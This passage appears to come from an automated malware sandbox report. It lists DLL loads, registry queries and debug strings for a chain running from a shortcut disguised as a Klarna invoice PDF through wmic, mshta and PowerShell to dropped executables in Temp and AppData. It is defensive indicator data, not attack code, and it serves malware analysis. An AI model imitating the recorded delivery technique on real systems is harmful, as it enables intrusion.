            Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: msi.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: cabinet.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: msxml3.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: feclient.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeSection loaded: apphelp.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: msi.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: version.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: cabinet.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: msxml3.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: wldp.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: profapi.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: feclient.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: iertutil.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: textinputframework.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: coremessaging.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: wintypes.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: wintypes.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: wintypes.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: msvfw32.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: winmm.dll
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeSection loaded: apphelp.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: apphelp.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: dbghelp.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: pla.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: pdh.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: tdh.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: cabinet.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: wevtapi.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: shdocvw.dll
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: dbghelp.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: pla.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: pdh.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: tdh.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: cabinet.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: wevtapi.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: shdocvw.dll
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: KlarnaInvoice229837.pdf.lnkLNK file: ..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeFile opened: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\msvcr90.dll
            Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: powershell.exe, 00000006.00000002.2073347152.000001EF10072000.00000004.00000800.00020000.00000000.sdmp, IMAKBWPY.exe, 00000010.00000000.1937547411.00000000009EB000.00000002.00000001.01000000.0000000F.sdmp, IMAKBWPY.exe, 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmp, IMAKBWPY.exe, 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmp, IMAKBWPY.exe, 00000011.00000000.1942070181.000000000027B000.00000002.00000001.01000000.00000011.sdmp, IMAKBWPY.exe.16.dr
            Source: Binary string: explorer.pdbUGP source: explorer.exe, 00000016.00000003.2529304928.0000000005595000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msvcr90.i386.pdb source: msvcr90.dll.18.dr
            Source: Binary string: mfdvdec.pdbUGP source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2571463926.0000000000366000.00000008.00000001.01000000.00000000.sdmp
            Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000004.00000003.2219075197.000001D04CEAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2219241314.000001D04CEAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221900308.000001D04CD61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2219075197.000001D04CE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2218300920.000001D04CEC4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2219486828.000001D04CE72000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2247275165.000001D04CD81000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2219737128.000001D048DB4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2220749210.000001D04CE07000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221325270.000001D048DAA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2221436947.000001D04CDC5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mfdvdec.pdb source: cmd.exe, 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2571463926.0000000000366000.00000008.00000001.01000000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: pyexec.exe, 00000012.00000002.2156013955.0000000008950000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000012.00000002.2160438736.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2350967507.0000000009021000.00000004.00000001.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349805985.000000000891F000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2350182430.0000000008C70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528670821.0000000004C46000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528981853.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572930085.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572486363.0000000004D27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: pyexec.exe, 00000012.00000002.2156013955.0000000008950000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000012.00000002.2160438736.0000000008CB0000.00000004.00000800.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2350967507.0000000009021000.00000004.00000001.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2349805985.000000000891F000.00000004.00000020.00020000.00000000.sdmp, pyexec.exe, 00000013.00000002.2350182430.0000000008C70000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528670821.0000000004C46000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2528981853.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572930085.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2572486363.0000000004D27000.00000004.00000020.00020000.00000000.sdmp
